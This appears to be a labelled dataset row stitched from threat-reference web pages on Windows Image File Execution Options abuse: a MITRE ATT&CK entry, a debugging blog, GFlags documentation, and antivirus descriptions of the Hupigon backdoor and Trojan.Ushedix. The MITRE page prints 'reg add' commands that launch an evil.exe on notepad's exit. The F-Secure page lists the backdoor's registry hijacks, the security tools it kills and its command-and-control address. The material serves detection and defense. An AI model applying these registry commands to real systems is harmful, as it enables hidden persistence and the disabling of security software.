Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Image File Execution Options Injection Image File Execution Options Injection Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\xe2\x80\x99s IFEO will be prepended to the application\xe2\x80\x99s name, effectively launching the new process under the debugger (e.g., ""C:\\dbg\\ntsd.exe -g notepad.exe""). [1] IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [2] IFEOs are represented as Debugger values in the Registry under HKLM\\SOFTWARE{{\\Wow6432Node}}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\ where is the binary on which the debugger is attached. [1] IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [3] [4] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\. [3] [4] An example where the evil.exe process is started when notepad.exe exits: [4] reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 reg add ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"" /v MonitorProcess /d ""C:\\temp\\evil.exe"" Similar to Process Injection, these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [5] Installing IFEO mechanisms may also provide Persistence via continuous invocation. Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. [6] [7] ID:\xc2 T1183 Tactic: Privilege Escalation, Persistence, Defense Evasion Platform:\xc2 Windows Permissions Required:\xc2 Administrator, SYSTEM Data Sources:\xc2 Process monitoring, Windows Registry, Windows event logs Defense Bypassed:\xc2 Autoruns Analysis Contributors:\xc2 Oddvar Moe, @oddvarmoe Version:\xc2 1.0 Mitigations This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Examples Name Description TEMP.Veles TEMP.Veles has modified and added entries within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options to maintain persistence. [8] Detection Monitor for common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as DEBUG_PROCESS and DEBUG_ONLY_THIS_PROCESS. [1] Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. [5] References Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017. Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017. Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018. Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018. Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017. FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017. Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017. Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&CK Mapping. Retrieved April 16, 2019. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Image File Execution Options (IFEO) \xe2\x80\x93 MITHUN SHANBHAG's blog This site uses cookies for analytics, personalized content and ads. By continuing to browse this site, you agree to this use. Learn more | Search MSDN Search all blogs Search this blog Sign in MITHUN SHANBHAG's blog MITHUN SHANBHAG's blog Image File Execution Options (IFEO) \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 \xe2\x98 Mithun ShanbhagMarch 24, 2010 Share 0 0 [NOTE: This is a repost from my old blog www.debugtricks.com. The old blog no longer exists and I'll be migrating my old posts over to this blog.] \xc2 Image File Execution options provides you with a mechanism to always launch an executable directly under the debugger. This is extremely useful if you ever need to investigate issues in the executable's startup code (services especially). You can set the IFEO options directly via the registry or indirectly using the Gflags tools (available with the Window debugging toolkit).\xc2 \xc2 \xc2 You need to create a registry key and populate it with a value as follows - Key\xc2 ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\"" Value\xc2 Debugger : REG_SZ : \xc2 \xc2 \xc2 You do not need the full path to the application, only the exe name will suffice. However you do need the full path to the debugger.\xc2 As an example, we look at launching notepad under ntsd, you would be creating the following - Key\xc2 ""HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"" Value\xc2 Debugger : REG_SZ : ""c:\\dbg\\ntsd.exe -g"" \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 You can also use Gflags to set IFEO too - \xc2 \xc2 \xc2 \xc2 How does IFEO work?\xc2 \xc2 \xc2 \xc2 Kernel32!CreateProcess when called without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags, checks the registry to see if IFEO has been set on the executable that it is launching. If yes, then it simply prepends the debugger path to the executable name, effectively getting the executable to launch under the debugger. If you do not specify the correct path to the debugger, then you'll probably get greeted with a ""file not found"" error. In our notepad/ntsd example above, Kernel32!CreateProcess ends up invoking - ""c:\\dbg\\ntsd.exe -g\xc2 notepad.exe""\xc2 \xc2 \xc2 \xc2 Now ntsd eventually launches notepad under the debugger by calling Kernel32!CreateProcess with one of the following creation flags - DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS. The presence of any of these creation flags forces Kernel32!CreateProcess to bypass IFEO options this time around (else we would have been running into an endless loop) and actually launch the executable under the debugger.\xc2 \xc2 \xc2 \xc2 \xc2 \xc2 IFEO and 64 bit -\xc2 \xc2 \xc2 \xc2 A word of caution - For 32 bit executable running in the WOW on X64 machines, your natural tendency might be to create the registry key in the syswow node - ""HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\""\xc2 \xc2 \xc2 \xc2 However Gregg Miskelly notes that you should set the IFEO corresponding to the bit-ness to the application calling into kernel32!CreateProcess to launch the executable -\xc2 \xc2 \xc2 \xc2 ""On Win 64, there are two copies of HKEY_LOCAL_MACHINE\\Software (one for 32-bit apps, and one for 64-bit apps), and therefore there are two copies of these options. However, where the operating system looks isn't dependant on the bit-ness of the application that is going to be debugged (which is what you would probably expect). Instead, it is dependent on the bit-ness of the application that called CreateProcess."" \xc2 \xc2 Other IFEO caveats -\xc2 Raymond Chen notes the following caveat in his blog entry\xc2 - ""If you passed special parameters via the STARTUPINFO structure, those parameters get passed to the debugger. And the PROCESS_INFO that is returned by the CreateProcess function describes the debugger, not the process being debugged."" \xc2 \xc2 \xc2 IFEO and Managed debuggers - IFEO can only be used for native or interop debugging, but not for managed debugging. Mike Stall has an excellent blog entry that describes in great detail exactly why. The gist is this - Managed debuggers like Mdbg/cordbg/VS.NET use ICorDebug::CreateProcess to launch managed executables under the debugger. However for managed debugging, the debugger should call ICorDebug::CreateProcess without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags (this is publicly documented). This API internally ends up calling Kernel32!CreateProcess without the DEBUG_PROCESS or DEBUG_ONLY_THIS_PROCESS creation flags. This leads to the endless loop that I described above. Is this an ICorDebug API design flaw?\xc2 Not really. Just an oversight in my opinion - The API designers missed one scenario. Maybe in the next version of the CLR this will be fixed (I do not know for sure). \xc2 \xc2 \xc2 Some excellent resources on IFEO - [MSDN] Launching the debugger automatically (How to launch VS debugger using IFEO) [Mike Stall] \xc2 IFEO and managed debugging [Raymond Chen] Image File Execution options just inserts the debugger in front of the command line [Gregg Miskelly] Inside 'Image File Execution Options' debugging [Junfeng Zhang] \xc2 Image File Execution Options (talks about the other not-so-well documented IFEO options) \xc2 \xc2 \xc2 Exercise for reader - Does IFEO work with other Win32 APIs like ShellExecute, CreateProcessAsUser, CreateProcessWithLogonW and CreateProcessWithTokenW? \xc2 \xc2 \xc2 TIP of the day - Question - System services can launch before the user has a chance to log on. So how do you debug the startup code of these system services? Answer - Put the machine under kernel Debugger (KD), use IFEO to launch the service under NTSD (use ntsd's\xc2 ""-d"" option to pipe the ntsd output to KD) and reboot the machine. When the system service launches, it will be launched under ntsd.\xc2 The ntsd debugger will automatically cause it break into KD when it encounters the initial loader breakpoint. The debugging session will begin in user mode automatically (yipee!). After you are done debugging, switch control to KD by issuing "".breakin"" command. \xc2 \xc2 \xc2 \xc2 \xc2 \xc2 Tags Debugging LinkFest Skip to main content Follow Us Popular Tags Debugging CLR Windows Programming LinkFest Soccer Archives January 2013\xc2 (1) August 2012\xc2 (1) March 2011\xc2 (1) March 2010\xc2 (1) December 2009\xc2 (1) July 2007\xc2 (1) May 2007\xc2 (1) December 2006\xc2 (3) November 2006\xc2 (1) All of 2013\xc2 (1) All of 2012\xc2 (1) All of 2011\xc2 (1) All of 2010\xc2 (1) All of 2009\xc2 (1) All of 2007\xc2 (2) All of 2006\xc2 (7) Privacy Terms of Use Trademarks \xc2\xa9 2019 Microsoft","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"GFlags Overview - Windows drivers | Microsoft Docs Skip to main content Contents Exit focus mode Feedback Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents GFlags Overview 06/12/2018 2 minutes to read In this article GFlags (gflags.exe), the Global Flags Editor, enables and disables advanced internal system diagnostic and troubleshooting features. You can run GFlags from a Command Prompt window or use its graphical user interface dialog box. For information on how to install and locate gflags.exe, see GFlags. Use GFlags to activate the following features: Registry Set system-wide debugging features for all processes running on the computer. These settings are stored in the GlobalFlag registry entry (HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\GlobalFlag). They take effect when you restart Windows and remain effective until you change them and restart again. Kernel flag settings Set debugging features for this session. These settings are effective immediately, but are lost when Windows shuts down. The settings affect all processes started after this command completes. Image file settings Set debugging features for a particular program. These settings are stored in a GlobalFlag registry entry for each program (HKEY_LOCAL_MACHINE\\ SOFTWARE\\ Microsoft\\ Windows NT\\ CurrentVersion\\ Image File Execution Options\\ ImageFileName\\ GlobalFlag). They take effect when you restart the program and remain effective until you change them. Debugger Specify that a particular program always runs in a debugger. This setting is stored in the registry. It is effective immediately and remains effective until you change it. (This feature is available only in the Global Flags dialog box.) Launch Run a program with the specified debugging settings. The debugging settings are effective until the program stops. (This feature is available only from the Global Flags dialog box.) Special Pool Request that allocation with a specified pool tag or of a specified size are filled from the special pool. This feature helps you to detect and identify the source of errors in kernel pool use, such as writing beyond the allocated memory space, or referring to memory that has already been freed. Beginning in Windows Vista, you can enable, disable, and configure the special pool feature (Kernel Special Pool Tag) as a kernel flags setting, which does not require a reboot, or as a registry setting, which requires a reboot. Page heap verification Enable, disable, and configure page heap verification for a program. When enabled, page heap monitors dynamic heap memory operations, including allocation and free operations, and causes a debugger break when it detects a heap error. Silent process exit Enable, disable, and configure monitoring and reporting of silent exits for a process. You can specify actions that occur when a process exits silently, including notification, event logging, and creation of dump files. For more information, see Monitoring Silent Process Exit. Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Feedback Send feedback about This product This page You may also leave feedback directly on GitHub . This page You may also leave feedback directly on GitHub . Liquid error: Can't find the localized string giveDocumentationFeedback for template Conceptual. Issue Title Leave a comment Submit feedback Loading feedback... There are no open issues There are no closed issues View on GitHub Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Backdoor:W32/Hupigon.EMV Description | F-Secure Labs Javascript is disabled in your web browser For full functionality of this site it is necessary to enable JavaScript. Here are the instructions how to enable JavaScript in your web browser. en_GLOBAL Labs Home Discover Whitepapers Threat Descriptions Security Advisories Articles Terminology Notify Submit A Sample Vulnerability Reward Program VRP Hall of Fame Spam Recategorization Resolve Removal Instructions Tools Consult Classification Guide Potentially Unwanted Applications Policies Enroll Home User Beta Program Business User Beta Program For home For business For partners Global Backdoor:W32/Hupigon.EMV GO TO: Summary | Removal | Technical Details Classification Category: Malware Type: Backdoor Platform: W32 Aliases: Backdoor.Win32.Hupigon.emv Summary A backdoor is a Remote Administration Tools (RAT) that expose infected machines to external control via the Internet by remote attackers. Removal Automatic action Based on the settings of your F-Secure security product, it will either move the file to the quarantine where it cannot spread or cause harm, or remove it. Find out more Knowledge Base Find the latest advice in our Community Knowledge Base. User Guide See the user guide for your product on the Help Center. Contact Support Chat with or call an expert for help. Submit a sample Submit a file or URL for further analysis. Technical Details This backdoor is detected as a member of the Hupigon family. the Backdoor:W32/Hupigon description provides additional details.Copies itself to: %Windows%\\dllhost.exe %Windows%\\setuprs1.PIF Replicates these original Windows applications with an additional ""EXE"" extension: %Windows%\\system32\\cmd.exe to %Windows%\\system32\\cmd.exe.exe %Windows%\\regedit.exe to %Windows%\\regedit.exe.exe Hupigon.EMV attempts to disable/redirect Windows applications using the following registry entries: HKLM\\Software\\Microsoft\\Windows NT\\ CurrentVersion\\Image File Execution Options\\cmd.exe Debugger = setuprs1.PIF HKLM\\Software\\Microsoft\\Windows NT\\ CurrentVersion\\Image File Execution Options\\regedit.exe Debugger = setuprs1.PIF HKLM\\Software\\Microsoft\\Windows NT\\ CurrentVersion\\Image File Execution Options\\regedt32.exe Debugger = setuprs1.PIF HKLM\\Software\\Microsoft\\Windows NT\\ CurrentVersion\\Image File Execution Options\\msconfig.exe Debugger = 7303.PIF Registers itself as Windows COM+ System Application service using these registry entries: HKLM\\System\\CurrentControlSet\\Services\\COMSystemApp Type = 00000110 HKLM\\System\\CurrentControlSet\\Services\\COMSystemApp ErrorControl = 00000000 HKLM\\System\\CurrentControlSet\\Services\\COMSystemApp ImagePath = C:\\WINDOWS\\dllhost.exe -netsvcs HKLM\\System\\CurrentControlSet\\Services\\COMSystemApp DisplayName = COM+ System Applications Attempts to locate and terminate the following process: 360tray.exe autoruns.exe avp.exe avpcc.exe cpf.exe ewido.exe FireTray.exe FireWall.exe FYFireWall.exe jpf.exe kav.exe KAVPF.exe KavPFW.EXE kpf4gui.exe KPFW32.EXE KVCenter.kxp KvMonXP.kxp KVXP.kxp McAfeeFire.exe mmc.exe outpost.exe PFW.exe procexp.exe Ras.exe RfwMain.EXE RRfwMain.EXE runiep.exe ssgui.exe SysSafe.exe TrojDie.kxp WoptiProcess.exe Attempts to close windows containing these strings: ZoneAlarm ZoneAlarm Pro Attempts to connect to 218.16.138.64 on TCP port 81. Propagation It attempts to propagate by creating ""\\runauto..\\autorun.pif"" and ""\\autorun.inf"" on all available drives, including removable drives.The autorun.inf file is detected as Worm.Win32.AutoRun.dms.The autorun.inf appears as: [AutoRun] open=RUNAUT~1\\autorun.pif shell\\1=´ò¿ª(&O) shell\\1\\Command=RUNAUT~1\\autorun.pif shell\\2\\=ä¯ÀÀ(&B) shell\\2\\Command=RUNAUT~1\\autorun.pif shellexecute=RUNAUT~1\\autorun.pif To make sure it will only run once, the mutex ""Red_Server_2007"" is created. File System Changes Create these directories: %drive%\\runauto..\\ Date Created: - Date Last Modified: - For Home For Home Products Download Renew For Business For Business Products and services Downloads and hotfixes Support For Partners For Partners Resellers Retailers Operators Blogs Blogs Safe and Savvy Business Security Insider F-Secure Labs About About News Investors Careers Offices Labs Labs Latest threats Remove threats Submit a sample Beta programs Support Knowledge base Community For Home For Business Global \xc2\xa9 F-Secure 2017 Terms of service Privacy policy Contact \xc3\x97 Choose your country or region Global Europe Belgi\xc3\xab Belgique \xd0\x91\xd1\x8a\xd0\xbb\xd0\xb3\xd0\xb0\xd1\x80\xd0\xb8\xd1\x8f Danmark Eesti Suomi France Deutschland \xce\x95\xce\xbb\xce\xbb\xce\xac\xce\xb4\xce\xb1 Magyarorsz\xc3\xa1g Italia Nederland Norge Polska Rom\xc3\xa2nia \xd0 \xd0\xbe\xd1\x81\xd1\x81\xd0\xb8\xd1\x8f Slovenia Espania Sverige T\xc3\xbcrkiye UK Americas USA Brasil Latin America Asia & Pacific Australia \xe4\xb8\xad\xe5\x9b\xbd Hong Kong India \xe6\x97\xa5\xe6\x9c\xac Malaysia New Zealand Directed to the Global website Website managed by a local partner","0","0","0","1","1","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Trojan.Ushedix | Symantec Search ENTERPRISE ENTERPRISE \xc2 \xc2 250+ BUSINESS \xc2 \xc2 1-250 PARTNERNET \xc2 \xc2 Sign In Required Products & Services Products & Services Home Products A-Z Integrated Cyber Defense Integrated Cyber Defense Advanced Threat Protection Advanced Threat Protection Information Protection Information Protection Endpoint Security Endpoint Security Email Security Email Security Web & Network Security Web & Network Security Cloud App Security Cloud App Security Services Services Business Security Business Security OTHER BRANDS Norton LifeLock ID Analytics DigiCert Website Security Norton LifeLock ID Analytics DigiCert Website Security Integrated Cyber Defense Integrated Cyber Defense Core Services Advanced Threat Protection Information Protection Control Points Endpoint Security Email Security Web & Network Security Cloud App Security The cloud is full of risk. Your security posture shouldn't be. Our Integrated Cyber Defense Platform lets you focus on your priorities \xc3\xa2\xe2\x82\xac\xe2\x80\x9d digital transformations, supply chain security, cloud migration, you name it \xc3\xa2\xe2\x82\xac\xe2\x80\x9d knowing you are protected from end to end Learn More Advanced Threat Protection Advanced Threat Protection Endpoint Protection Family Endpoint Detection and Response (EDR) Messaging Security Family Email Threat Detection and Response Hybrid Cloud Security Family Encrypted Traffic Management Family Secure Web Gateway Family Content & Malware Analysis Network Forensics & Security Analytics Web Isolation WebFilter / Intelligence Services Web Application Firewall & Reverse Proxy 11 Times Running*, Gartner Magic Quadrant Leader for Secure Web Gateways Read the Report Information Protection Information Protection DLP Family Data Loss Prevention Data Loss Prevention Cloud & Symantec CloudSOC Data Loss Prevention Cloud Service for Email Information Centric Security Family Information Centric Analytics Information Centric Tagging Information Centric Encryption Identity Family VIP Enterprise VIP Consumer Encryption Family Endpoint Encryption Desktop Email Encryption File Share Encryption Accelerate Your GDPR Readiness with The GDPR for Dummies guide Read the Guide Endpoint Security Endpoint Security Endpoint Protection Family Endpoint Protection Endpoint Protection Mobile Endpoint Detection and Response (EDR) Endpoint Threat Defense for Active Directory Endpoint Security Suites IOT Family Hybrid Cloud Security Family Storage Protection Cloud Workload Protection Data Center Security Endpoint Management Family Client Management Suite Server Management Suite Asset Management Suite Ghost Solution Suite A Leader once again in 2019 Gartner Magic Quadrant for Endpoint Protection Platforms Read the Report Email Security Email Security Messaging Security Family Email Security.cloud Messaging Gateway Email Threat Detection and Response Phishing Readiness Mail Security for Microsoft Exchange DLP Family Data Loss Prevention Cloud Service for Email Encryption Family Desktop Email Encryption Gateway Email Encryption Symantec named a Leader in The Forrester Wave\xc3\xa2\xe2\x80\x9e\xc2\xa2: Enterprise Email Security, Q2 2019 Read the Report Email is still the #1 attack vector\xc3\xa2\xe2\x82\xac\xe2\x80\x9dand it\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s your job to secure Office 365. Now What? View the Checklist Web & Network Security Web & Network Security Secure Web Gateway Family Web Security Service Secure Access Cloud Web Isolation ProxySG and Advanced Secure Gateway Content & Malware Analysis WebFilter / Intelligence Services Web Application Firewall & Reverse Proxy Management Center and Reporting Encrypted Traffic Management Family SSL Visibility Appliance Network Performance Optimization Family MACH5 PacketShaper Cloud Access Security Broker (CASB) Family DLP Family Identity Family 11 Times Running*, Gartner Magic Quadrant Leader for Secure Web Gateways Read the Report Cloud App Security Cloud App Security Cloud Access Security Broker (CASB) Family CloudSOC Audit \xc3\xa2\xe2\x82\xac\xe2\x80\x9c Shadow IT CloudSOC CASB Gateway CloudSOC CASB for SaaS CloudSOC CASB for IaaS Hybrid Cloud Security Family Cloud Workload Protection Control Compliance Suite Storage Protection Secure Web Gateway Family Web Security Service Secure Access Cloud Web Isolation Malware Analysis Service Trusted Mobile Device Security Service Web Application Firewall & Reverse Proxy DLP Family Data Loss Prevention Cloud and Symantec CloudSOC Data Loss Prevention Cloud Service for Email Email Security Family Email Security.cloud Email Threat Detection and Response Identity Family VIP Security without compromise: the broadest, deepest protection for the public cloud Learn More Services Services Cyber Security Services Managed Security Services - Threat Monitoring DeepSight Intelligence Technical Intelligence Adversary Intelligence Incident Response Services Emergency Response Retainers and Response Readiness Managed Endpoint Detection and Response Service Other Services Consulting Services Education Services Premium Support Find Out Why Symantec is a Gartner MQ Leader 15 years running Read the Report Business Security Business Security Products Endpoint Protection Cloud Endpoint Protection Cloud Server Drive Encryption Endpoint Protection Small Business Edition Pricing Learn My Account Shop Online Welcome to the New Symantec Business Security Experience! Shopping for the right business products and managing your account is now easier than ever. Shop Now Solutions Solutions Home Topics Topics Industries Industries Government Government Cloud Cloud Topics Topics Advanced Threat Protection Cloud Security Election Security GDPR & Data Privacy Internet of Things (IoT) Security Office 365 Security Secure Access Zero Trust Security Symantec Internet of Things (IOT) Security Unveiling the industry\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s first neural network to protect critical infrastructure from cyber warfare Learn More Email is still the #1 attack vector\xc3\xa2\xe2\x82\xac\xe2\x80\x9dand it\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s your job to secure Office 365. Now What? View the Checklist Industry Solutions Industry Solutions Automotive Education Financial Services Global Service Providers Industrial Control Systems Healthcare Retail Cyber Security and Healthcare: An Evolving Understanding of Risk An ISTR Executive Healthcare Summary for Healthcare Professionals Read the Summary Government Solutions Government Solutions Federal Government State & Local Election Security 2018 Democracy is impossible without cyber security The good news? It\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s not too late to take basic steps to preserve the integrity of our elections\xc3\xa2\xe2\x82\xac\xe2\x80\x9dright now Learn More Cloud Solutions Cloud Solutions Amazon Web Services Oracle Cloud AWS Security Best Practices Guide and Configuration Checklist Symantec has worked together with AWS to develop an essential guide to AWS security Download Now Support Center Support Center Home Technical Support Technical Support Symantec Connect Symantec Connect Manage Your Product Manage Your Product Training Training Norton Support Technical Support Technical Support Product A-Z MySymantec Licensing Portal Symantec Earns TSIA Global Rated Outstanding, Assisted & Self Service Support Certification Learn More Symantec Connect Forums Blogs User Groups How to Find a Symantec Product Forum This two-step guide helps you find product support and information in the Connect user community Read the Guide Manage Your Product Maintenance Licensing Information Getting Started Renewals Software Upgrades Policies Connect User Community A peer-to-peer community for Symantec business customers, partners, and employees Join the Conversation Training Training Courses Certification E-Library Security Awareness Service Symantec Certification Validate your investment in training and experience, and boost your credibility today Learn More Security Center Security Center Home Updates Updates Advisories Advisories Publications Publications Tools Tools Topics Topics Updates Updates Virus Definitions & Updates Threats Risks Vulnerabilities 2019 Internet Security Threat Report Formjacking. Targeted Attacks. Living off the Land. Coming for Your Business. Read the Report Cloud Security Threat Report (CSTR) Adapting to the new reality of evolving cloud threats. Read the Report Advisories Advisories Symantec Security Advisories Analysis from Symantec\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s Global Threat Intelligence Team Unparalleled understanding and commentary on the cyber threats affecting businesses today Stay Informed Publications Publications ISTR CSTR Blogs Monthly Threat Report Endpoint Protection Mobile Threat Reports Security White Papers Research Labs 2019 Internet Security Threat Report Formjacking. Targeted Attacks. Living off the Land. Coming for Your Business. Read the Report Cloud Security Threat Report (CSTR) Adapting to the new reality of evolving cloud threats. \xc3\x82\xc2 Read the Report Tools Tools Removal Tools Spyware Removal Treating Infected Systems Legitimate Files in Quarantine Symantec Cyber Security Brief Podcast Cyber Security news and analysis by Symantec threat researchers Listen and Subscribe Topics Topics Ransomware Cyber Criminals Ramp Up Attacks on Trusted Software and Supply Chains Learn about this year\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s Internet Security Threat Report from Symantec Read the Blog Blogs Blogs Home Blogs Blogs Categories Categories Threat Intelligence Featured Stories Expert Perspectives Product Insights Corporate Responsibility Diversity & Inclusion Symantec Connect Cyber Criminals Ramp Up Attacks on Trusted Software and Supply Chains Learn about this year\xc3\xa2\xe2\x82\xac\xe2\x84\xa2s Internet Security Threat Report from Symantec Read the Blog Partner Partners Home Partner with Symantec Partner with Symantec PartnerNet PartnerNet TIPP TIPP Partner with Symantec Partner with Symantec Find a Partner Become a Partner Product Resources for Partners Sign in to PartnerNet Sign in to TIPP Contact Partner Service Contact Partner Service with questions about partnering opportunities and your existing business with Symantec Learn More PartnerNet PartnerNet My Dashboard Products Marketing Partner Support Center Training Other Resources Financial Benefits Partner Licensing Partner Renewal Infrastructure Attacks and Stealthy Mining\xc3\xa2\xe2\x82\xac\xe2\x80\x9dThreats Go Big and Small Read the Report TIPP TIPP My Dashboard Marketing TIPP Support Center Infrastructure Attacks and Stealthy Mining\xc3\xa2\xe2\x82\xac\xe2\x80\x9dThreats Go Big and Small Read the Report United States / English Sign In/Register Hi My Account Log out Security Center / Trojan.Ushedix Trojan.Ushedix Printer Friendly Page Summary Technical Description Removal Discovered: June 28, 2008 Updated: June 28, 2008 10:56:37 AM Type: Trojan Infection Length: 19,381 bytes Systems Affected: Windows Trojan.Ushedix is a Trojan horse that replaces system files and infects the user32.dll file in order to download potentially malicious files. Antivirus Protection Dates Initial Rapid Release version June 28, 2008 revision 001 Latest Rapid Release version May 07, 2019 revision 006 Initial Daily Certified version June 28, 2008 revision 004 Latest Daily Certified version May 07, 2019 revision 008 Initial Weekly Certified release date July 02, 2008 Click here for a more detailed description of Rapid Release and Daily Certified virus definitions. Technical Description When the Trojan is executed, it creates the following file: C:\\NBA_Temp\\__nba_ok__ It then replaces the following files with its components: %System%\\dxdiag.exe (Trojan.Ushedix) %System%\\winhlp32.exe 